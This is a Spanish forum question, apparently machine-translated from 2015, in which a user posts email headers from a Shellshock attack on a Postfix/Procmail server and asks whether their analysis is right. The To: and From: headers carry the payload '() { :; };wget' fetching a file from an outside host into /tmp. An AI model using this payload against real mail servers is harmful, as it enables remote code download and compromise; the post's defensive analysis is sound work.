ataque en el análisis procmail de Unix

4

Hace 2 días recibí el siguiente correo electrónico (este es su formato original no la de ningún remitente, pero cuando la información confidencial se reemplaza por •• field_name ••):

From [email protected] Thu Jul 2 23:59:07 2015 Return-Path: <[email protected]> X-Original-To: nobody@••my_domain•• Delivered-To: nobody@••my_domain•• Received: from website.com (bearing.headissue.net [178.248.246.217]) by ••my_mail_server•• (Postfix) with SMTP id 9CE261C542901 for <nobody@••my_domain••>; Thu, 2 Jul 2015 23:59:07 +0200 (CEST) To:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD From:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD Status: RO Content-Length: 0 Lines: 0

  • ataque dirigido hacia Postfix MX donde el MDA es Procmail
  • el To: & Los campos From: están orientados a disparar Shellshock en bash que se usa con frecuencia dentro de Procmail rules
  • este ataque habría descargado un malware de un sitio de descarga en Siliguri (India) dentro de /tmp/._ (archivo oculto a los maniquíes)
  • en el caso de un /etc/procmailrc existente que se ejecuta con los privilegios root , no se habría ejecutado automáticamente ningún riesgo más arriesgado
  • el origen de la conexión es en München, cerca de la Universidad
  • el origen (@IP) del ataque está activado pero no responde a ninguna conexión tcp
  • el malware potencial HTML lleva un 404

Aquí hay algunas hipótesis personales sobre este ataque:

  • el sitio de descarga (mlanissan.co.in) fue pirateado, utilizado, detectado y limpiado por sus propietarios
  • el sitio de control de ataques (bearing.headissue.net) es muy probablemente un funcionamiento de Unix, fue pirateado, usado y aún no detenido por sus respectivos propietarios, está bien protegido por los hackers

¿Son correctos mi análisis y mi hipótesis?

¿Tienes algún mejor análisis e hipótesis?

    
pregunta daniel Azuelos 04.07.2015 - 18:23
fuente

0 respuestas

Lea otras preguntas en las etiquetas